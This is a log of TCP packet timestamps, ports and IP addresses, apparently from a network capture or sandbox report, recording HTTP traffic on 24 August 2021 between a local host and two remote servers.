Aug 24, 2021 08:46:53.920025110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.920033932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.920054913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.920748949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.921853065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.921878099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.921895027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.921911001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.921930075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.921947956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.921994925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935101032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935189962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935228109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935267925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935303926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935331106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935338020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935373068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935400009 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935400963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935437918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935467958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935476065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935488939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935513973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935568094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935592890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935631037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935667038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935679913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935702085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935741901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935756922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935781002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935816050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935830116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935853004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935892105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935904026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.935925961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935962915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.935973883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.936000109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.936037064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.936053038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:54.017188072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:54.273030996 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.289278984 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.289395094 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.290574074 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.306658030 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318861008 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318886995 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318902016 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318921089 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318937063 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318942070 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.318948984 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318967104 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.318981886 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319000959 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319010973 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.319019079 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319046974 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.319072008 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.319694042 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319725037 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319742918 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319761992 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319782019 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.319802046 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.319861889 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.320689917 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.320708990 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.320724010 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.320740938 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.320745945 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.320755959 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.320785046 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.320828915 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.321604013 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.321624041 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.321640968 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.321655989 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.321671963 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.321675062 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.321713924 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.322536945 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.322555065 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.322571039 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.322587967 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.322599888 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.322603941 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.322647095 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.335215092 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335242987 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335258007 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335278034 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335361004 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.335484028 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335503101 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335520029 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335539103 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335553885 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.335556030 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.335599899 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.336452007 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.336471081 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.336488008 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.336504936 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.336534023 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.336565971 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.337210894 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.337229967 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.337253094 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.337266922 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.337272882 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.337287903 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.337307930 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.337351084 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.338179111 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.338196993 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.338213921 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.338229895 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.338251114 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.338308096 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.339109898 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.339152098 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.339169025 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.339185953 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.339202881 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.339243889 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.339282036 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.340065956 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.340085983 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.340122938 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.340140104 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.340152979 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.340159893 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.340192080 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.341017962 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341038942 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341054916 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341089010 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.341142893 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.341573000 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341590881 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341607094 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341623068 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341641903 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.341697931 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.342542887 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.342561007 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.342576981 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.342592955 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.342611074 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.342783928 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.343528032 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.343548059 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.343564987 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.343607903 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.351474047 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.351501942 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.351521015 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.351535082 CEST	80	49716	172.67.216.236	192.168.2.7
Aug 24, 2021 08:46:54.351572037 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:54.351593018 CEST	49716	80	192.168.2.7	172.67.216.236
Aug 24, 2021 08:46:56.022943974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.023004055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.045177937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.068566084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.093538046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.093611002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.115770102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.141657114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.155107975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.155162096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.177278042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240142107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240181923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240257978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240286112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240305901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.240331888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240366936 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.240371943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240395069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240418911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240422010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.240475893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240503073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.240530968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.240571976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263052940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263086081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263107061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263202906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263202906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263227940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263248920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263248920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263271093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263293028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263298988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263318062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263365030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263367891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263387918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263407946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263408899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263434887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263448000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263458967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263506889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263514996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263540030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263562918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263622046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263627052 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263644934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263673067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.263705015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.263715029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.286695957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286731005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286756039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286780119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286803961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286827087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286851883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286874056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286897898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286920071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286943913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.286967039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287004948 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287017107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287019014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287022114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287044048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287064075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287081003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287098885 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287101030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287147045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287156105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287170887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287188053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287199020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287210941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287228107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287245035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287250042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287271023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287271976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287292957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287308931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287326097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287337065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287348032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287365913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287377119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287388086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287405968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287410021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287429094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.287447929 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.287508965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.288554907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.288578987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.288598061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.288615942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.288630962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.288647890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.288677931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.288706064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.288747072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309506893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309559107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309581995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309604883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309627056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309643030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309644938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309669018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309685946 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309689999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309712887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309721947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309736967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309742928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309762001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309787035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309812069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309813976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309838057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309845924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309861898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309884071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309887886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309907913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309931040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309952974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309952974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.309979916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.309998989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310000896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310017109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310031891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310034037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310050964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310058117 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310067892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310084105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310092926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310101032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310120106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310137033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310137987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310153008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310167074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310168982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310184956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310199976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310201883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310219049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310234070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310241938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310257912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310267925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:56.310277939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:56.310297012 CEST	80	49715	212.224.105.79	192.168.2.7
